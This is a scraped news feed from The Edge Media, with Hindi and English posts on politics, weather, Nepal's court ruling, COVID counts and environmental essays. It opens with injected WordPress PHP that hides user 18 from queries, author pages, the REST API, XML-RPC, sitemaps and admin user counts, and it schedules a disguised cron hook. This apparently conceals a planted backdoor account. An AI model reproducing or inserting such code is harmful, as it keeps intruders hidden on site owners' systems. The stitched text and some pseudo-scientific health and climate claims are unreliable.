add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post बदसुलूकी का शिकार सपा कार्यकर्ता रितु सिंह ने थामा कांग्रेस का दामन appeared first on The Edge Media.
]]>
कांग्रेस के प्रवक्ता ने विपक्षी नेतृत्व को आड़े हाथों लेते हुए कहा ” जब लखीमपुर की बेटी रितु सिंह के साथ भाजपा के गुंडे अत्याचार कर रहे थे उस
समय ये लोग क्या कर रहे थे । हमारी नेता ऐसे समय मे रितु सिंह के साथ खड़ी होती है,अन्याय के खिलाफ।इसी का परिणाम है कि प्रदेश का युवा और महिलाएं कांग्रेस के प्रभावशाली नेतृत्व में न सिर्फ अपना विश्वास व्यक्त कर रहे हैं,बल्कि जुड़ रहे हैं, यह सिलसिला अब आगे और बड़ा हो रहा है।
Report : Brijesh Shukla
The post बदसुलूकी का शिकार सपा कार्यकर्ता रितु सिंह ने थामा कांग्रेस का दामन appeared first on The Edge Media.
]]>The post China’s President Xi Puts Wealthiest Citizens On Notice appeared first on The Edge Media.
]]>Since Xi took office in 2012, the ruling party has made it a priority to end poverty and build a moderately prosperous society, goals that the party sees as central to promoting well-being and strengthening its governance. Income inequality in the country is wide — the richest 20% earn more than 10 times poorest 20% — and hasn’t budged since 2015.
Beijing has undertaken massive efforts to reduce poverty, especially in rural areas. More recently, its taken aim at the upper end of the spectrum, with a crackdown on the technology industry, which has minted several billionaires, and criticism of the excesses of celebrity culture.
The post China’s President Xi Puts Wealthiest Citizens On Notice appeared first on The Edge Media.
]]>The post Rains lash Delhi-NCR, key areas waterlogged appeared first on The Edge Media.
]]>As the reports suggest the downpour started around 4 am. However, traffic was normal with no major disruptions due to the waterlogging, so far. Skymet previously predicted that several parts of northern India will witness heavy rainfall throughout the entire first week of August. The heavy rains lashing Punjab, Haryana, Delhi, and Uttar Pradesh are set to continue till August 8.
India Meteorological Department (IMD) has further predicted the regions set to witness rainfall on Sunday include Delhi, Noida, Ghaziabad, Gurugram, and Faridabad, among several other nearby areas. “Thunderstorms, with moderate to heavy intensity rains, would occur over and adjoining areas of entire Delhi-NCR,” read the alert issued by the IMD.
Starting off as an unusually hot month, July ended up with 507 mm of rain twice that of Delhi’s average of 210.6mm for the month, making it the wettest in the past 18 years, another weather extreme that was characteristic of the patterns being observed in the capital since August 2020.
The post Rains lash Delhi-NCR, key areas waterlogged appeared first on The Edge Media.
]]>The post सावन के महीने में भगवान शिव की पूजा क्यों, जानिये वैज्ञानिक कारण appeared first on The Edge Media.
]]>भगवान शिव की पूजा सावन में क्यों होती है
डॉ. सिंह बताते हैं कि शिव को देवों का देव महादेव कहा जाता है। वेदों में इन्हें रूद्र नाम से पुकारा गया है। अब आपको कुछ ऐसे काम बताते है, जिन्हे सावन में करने से भगवान शिव प्रसन्न हो जाते हैं जैसे सावन के महीने में शिवलिंग की पूजा की जाती है, लिंग सृष्टि का आधार है और शिव विश्व कल्याण के देवता है। शिवलिंग से दक्षिण दिशा में ही बैठकर पूजन करने से मनोकामना पूर्ण होती है। शिवलिंग पूजा में दक्षिणा दिशा में बैठकर करके साथ भक्त को भस्म का त्रिपुण्ड लगाना चाहिए, रूद्राक्ष की माला पहननी चाहिए और बिना कटेफटे हुये बिल्वपत्र अर्पित करने चाहिए।
शिवलिंग की कभी पूरी परिक्रमा नहीं करनी चाहिए; आधी परिक्रमा करना ही शुभ होता है।
सावन में शिव की पूजा का वैज्ञानिक कारण (Sawan Ka Scientific Reason)
स्कूल ऑफ मैनेजमेंट साइंसेज, लखनऊ के निदेशक डा. भरत राज सिंह का कहना है कि शिव ब्रह्माण्ड की शक्ति के द्योतक हैं। शिव लिंग काले पत्थर का ही होता है, जो वातावरण व ब्रह्माण्ड से ऊर्जा अवशोषित करता रहता है। इस ऊर्जा को पूर्ण रूप से शिवलिंग में समाहित करने के लिए इसको साफ सुथरा रखने व जल, दूध आदि से अभिषेक करने की प्रथा शुरू हुई हैं, जिससे पूजा अर्चना के समय आप को उपयुक्त ऊर्जा प्राप्त हो और प्रदूषित ऊर्जा समाप्त हो जाए। वह बताते हैं कि सावन का महीना ऐसा होता है जब बरसात से मौसम का एक माह से ज्यादा समय गुजर चुका होता है, उसके बाद मौसम में नमी व काफी सुहावनापन आ जाता है। बरसात के मौसम में शुरु के एक महीने में वातावरण में मौजूद विषाक्त गैसे व कार्बन आदि धरती पर पानी के कणों के साथ आ जाते हैं और अक्सर स्त्रियों व बच्चों में त्वचा सम्बन्धी रोग उत्पन्न हो जाते हैं। इन रोगों को दूर करने हेतु ही सावन में औरतो द्वारा शिवलिंग पर अभिषेक (जल, दूध, घी, शहद आदि) से किया जाता है जिससे त्वचा रोग के जर्म भी शिव लिंग में अवशेषित होकर उनके शरीर के बैक्टीरिया भी नष्ट हो जाते हैं और औरतें निरोगी हो जाती हैं तथा शिवलिंग से अच्छी ऊर्जा ग्रहण करती हैं।

The post सावन के महीने में भगवान शिव की पूजा क्यों, जानिये वैज्ञानिक कारण appeared first on The Edge Media.
]]>The post ई–कचरा एक पर्यावरण व मानव स्वाथ्य के लिए घातक appeared first on The Edge Media.
]]>इंस्टीट्यूट ऑफ़ इंजीनियर्स गोरखपुर के अध्यक्ष , धीरेन्द्र चतुर्वेदी ने अतिथियों का स्वागत व वेद प्रकाश गुप्ता, मानद सचिव ने वेबिनार में सामिल सभी प्रतिभागियों को धन्यवाद ज्ञापित किया |
The post ई–कचरा एक पर्यावरण व मानव स्वाथ्य के लिए घातक appeared first on The Edge Media.
]]>The post Nepal SC orders to appoints Sher Bahadur Deuba as Prime minister within two days appeared first on The Edge Media.
]]>Reacting to SC’s decision CPN-UML spokesperson and former foreign minister Pradeep Gyawali told TOI the order is unexpected and contrary to fundamental principles of Constitution.
“Wrong and unjustifiable but will abide by it,” he said.
Nepal’s President Bidya Bhandari had dissolved the lower house for the second time in five months on May 22 and announced snap elections on November 12 and November 19 based on PM KP Sharma Oli’s recommendation.
As many as 30 petitions were filed at the Supreme Court against the move. A petition filed by the opposition parties’ alliance had demanded the reinstatement of the Lower House of Parliament and appointment of Nepali Congress president Sher Bahadur Deuba as the prime minister. The Constitutional Bench of the apex court concluded the hearings on the writ petitions on July 5. A four-member amicus curiae also presented its opinion on the House dissolution case.
(With inputs from the agencies)
The post Nepal SC orders to appoints Sher Bahadur Deuba as Prime minister within two days appeared first on The Edge Media.
]]>The post वाराणसी- लोहता में पीने के पानी को लेकर हाहाकार appeared first on The Edge Media.
]]>लोहता में कुल 06 ट्यूबेल है जिसमे 4 ट्यूबेल खराब पड़े है।
3 बड़े ट्यूबेल खराब हो गए 01 ट्यूबेल का स्विचवाल खराब है।
आबादी अधिक होने कारण जल आपूर्ति पूर्णरूप से नही हो पा रही है।
यह जानने की कोशिश में एक और सच सामने आया यहाँ तक कि 05 माह से देखरेख में रखे कुल 9 कर्मचारियों से वेतन भी नही मिला है।
यदि तत्काल समस्या का हल नही निकाला गया तो जल संकट से जनता की परेशानी अत्यधिक बढ़ जायेगी।
The post वाराणसी- लोहता में पीने के पानी को लेकर हाहाकार appeared first on The Edge Media.
]]>The post Live Corona virus update: appeared first on The Edge Media.
]]>Total cases: 2,91,83,121.
Total discharges: 2,76,55,493.
Death toll: 3,59,676.
Active cases: 11,67,952.
Total vaccination: 23,90,58,360.
The post Live Corona virus update: appeared first on The Edge Media.
]]>The post उन्नाव नगरपालिका और प्रदूषण की अस्वस्थ परम्परा appeared first on The Edge Media.
]]>The post उन्नाव नगरपालिका और प्रदूषण की अस्वस्थ परम्परा appeared first on The Edge Media.
]]>The post पर्यावरण असंतुलन व जलवायु परिवर्तन की पारिस्थितिकी तंत्र की बहाली के सार्थक उपाय appeared first on The Edge Media.
]]>
डॉ. भरत राज सिंह,
महानिदेशक व वरिष्ठ पर्यावरणविद
स्कूल आफ मैनेजमेण्ट साईसेन्ज लखनऊ
मो: 9415025825, 9935025825 ; ईमेल : brsinghlko@yahoo.com
आज पर्यावरण के असंतुलन से सम्पूर्ण विश्व आपदाओं से घिरा हुआ है। हम यह भी जानते है कि इसका मुख्य कारण विश्व की जनसंख्या में अप्रत्याशित वृद्धि; जिसके फलस्वरूप विकसित व विकासशील देशों में औद्योगिकीकरण की बढ़ोत्तरी हुयी और पृथ्वी के अवयवों का विशेषकर-हाइड्रोकार्बन का अनियमित दोहन हुआ है। वही दूसरी तरफ वाहनों की आवश्यकता में कई गुना वृद्धि से पर्यावरण में कार्बन के उत्सर्जन व अन्य नुकसानदायक गैसों की मात्रा में निर्धारित सीमा से कई गुना वृद्धि प्रत्येक वर्ष हो रही है। जिससे वैश्विक तापमान में वृद्धि और पर्यावरण असंतुलन के कारण सम्पूर्ण विश्व आपदाओं से घिरा हुआ है।
पिछले दशकों में तापमान में भी 2-3 डिग्री सेन्टीग्रेड की वृद्धि हो चुकी है। इससे ग्लेसियर व आइस लैण्ड व आर्कटिक समुद्र में अत्यधिक पिघलाव हो रहा है। प्रत्येक दशक में ग्लेसियर में 12.5 प्रतिशत की कमी आ रही है तथा समुद्र की सतह में निरन्तर 2.54 मि0मी0 प्रतिवर्ष की बढ़ोत्तरी हो रही है। उपरोक्त कारणों से जलवायु में परिवर्तन बहुत तेजी से हो रहा है तथा विश्व में अप्रत्याशित आपदाएँ भी घटित हो रही है। जिसका आकलन करना असम्भव हो रहा है कि विश्व में कब, कहाँ व क्या घटित होगा? इन आपदाओं से कही अतिवृष्टि से अधिक जानमाल का नुकसान, कही अति ओलावृष्टि व कही सूखे की मार से जन-जीवन को भारी नुकसान हो रहा है।
विश्व पर्यावरण क्षति हेतु 20-प्रमुख चुनौतियाँ का सामना कर रहा है; प्रदूषण, मिट्टी का क्षरण, ग्लोबल वार्मिंग, अधिक जनसंख्या, प्राकृतिक संसाधनों का ह्रास, स्थायी अपशिष्ट उत्पन्न करना, अपशिष्ट निपटान, वनों की कटाई, ध्रुवीय बर्फ की टोपियां, जैव विविधता का नुकसान, जलवायु परिवर्तन, महासागर अम्लीकरण, नाइट्रोजन चक्र, ओजोन परत का क्षरण, अम्ल वर्षा, जल प्रदूषण , ओवरफिशिंग, शहरी फैलाव, सार्वजनिक स्वास्थ्य मुद्दे और जेनेटिक इंजीनियरिंग।
आज सम्पूर्ण विश्व जलवायु परिवर्तन और वैश्विक तापमान की विभीषिका से ग्रसित है। उत्तरी धु्रव के तेजी से पिघलने के कारण जहां समुद्र की सतह में बढ़ोत्तरी हो रही है वही अटलांटिक महासागर की छोर जो कनाडा, उत्तरी-पूर्वी अमेरिका तथा पश्चिमी-उत्तरी संयुक्त राष्ट्र के देशों (फ्रांस, जर्मनी ब्रिटेन) में समुद्री तूफान, जलप्लावन, ओलावृष्टि आदि से दिसम्बर माह से अप्रैल तक जनजीवन अस्त-व्यस्त हो रहा है तथा कभी-कभी 4 से 6 फीट बर्फबारी होने से आपातकाल लागू किया जाता है और वहां के निवासियों को 15-20 दिन न निकलने के लिए हिदायत दी जाती है।
पिछले वर्ष से सम्पूर्ण विश्व कोविद-19 की महामारी से जूझ रहा है और अर्थ व्यवस्था भी पूर्णरूप से चरमरा गयी है । अभी तक विश्व में 17.25 करोड लोग संक्रमित हुये, 37.1 लाख लोगो की मृत्यु हो चुकी है और उनमें से 15.51 करोड लोग स्वस्थ हुये। विकास का पहिया रूक गया है । इस स्थिति से जब विश्व के समस्त विकसित व विकाशसील गुजर रहे हैं तो भारतवर्ष व अन्य विकाशसील देशो की स्थिति कोरोना, तूफानों, ग्लेसिअर के गिरने और अतिवृष्टि, सूखा आदि से बत से बत्तर हो रही है। आनेवाले समय में बच्चो का क्या भविष्य होगा, यह भी एक चिंतनीय विषय है। ऐसी स्थिति में सम्पूर्ण विश्व मानव को पर्यावरण सुरक्षा हेतु कारगर उपाय तत्काल ढूढ़ने व उसे तत्परता से लागू करने की आवश्यता है जिससे वर्तमान में हो रही अप्रत्याशित घटनाओं में कमी लायी जा सके और आने वाली पीढ़ी को भी राहत मिल सके।
पर्यावरण सुरक्षा व पारिस्थितिकी तंत्र की बहाली के लिये सार्थक उपायों में मुख्यतः हमें निम्नलिखित बिन्दुओं पर ध्यान देना आवश्यक होगाः-
अधिक से अधिक फलदार पेड़ों का लगाया जाना, रोशनी मे परिवर्तन एल0ई0डी0 बल्ब/एल0ई0डी0 ट्यूब लाइट का प्रयोग, जल संरक्षण के सार्थक उपाय, वैकल्विक ऊर्जा का अधिक से अधिक उपयोग (जैसे-सोलर, बायोमास, मिनी हाइड्रो), ग्रामीण रोजगार की बढ़ोत्तरी, तापीय बिजली घरों का नवीनीकरण, वाहनों में बिना ज्वलनशील ईधन का उपयोग, इलेक्ट्रानिक उपकरणों का जब प्रयोग न हो तो बन्द रखना, पालीथीन बैग की जगह कागज व कपड़े के थैलों का उपयोग करना औरपर्यावरण के मुद्दों के बारे में सूक्ष्म जानकारी दूसरों के साथ बांटना।
यहाँ यह भी उल्लेखनीय है कि यदि वर्तमान में कारगर उपाय न किये गये तो वर्ष 2040 तक हाइड्रोकार्बन जिसका पृथ्वी से दोहन हो रहा है, लगभग समाप्त के कगार पर होगा व उत्तरी धु्रव पर बर्फ के तीव्रता से पिघलने के कारण नाम-मात्र ही बर्फ मौजूद रहेगी तथा विश्व के सभी पर्वतीय श्रृंखलाओं में जहां ग्लेसियर है, समाप्त हो जायेंगे, जिससे समुद्र की सतह में लगभग 13 से 14 फीट पानी की बढ़ोत्तरी होना सम्भव है तथा 2015 के वर्तमान शोध के अनुसार पृथ्वी के घूर्णन में परिवर्तन होना निश्चित है एवं पृथ्वी की गति में भी कमी आना सम्भव है, जिससे किसी भी अप्रत्याशित घटना होने से नकारा नहीं जा सकता है।
आइये हम प्रत्येक दिवस को ‘पर्यावरण दिवस’ मनाकर, सम्पूर्ण जनमानस को पर्यावरण संरक्षण हेतु निम्नलिखित नारे से झंकृत करें।
‘‘पर्यावरण बचाओं – पृथ्वी बचाओ – जीवन बचाओ’’
*****
The post पर्यावरण असंतुलन व जलवायु परिवर्तन की पारिस्थितिकी तंत्र की बहाली के सार्थक उपाय appeared first on The Edge Media.
]]>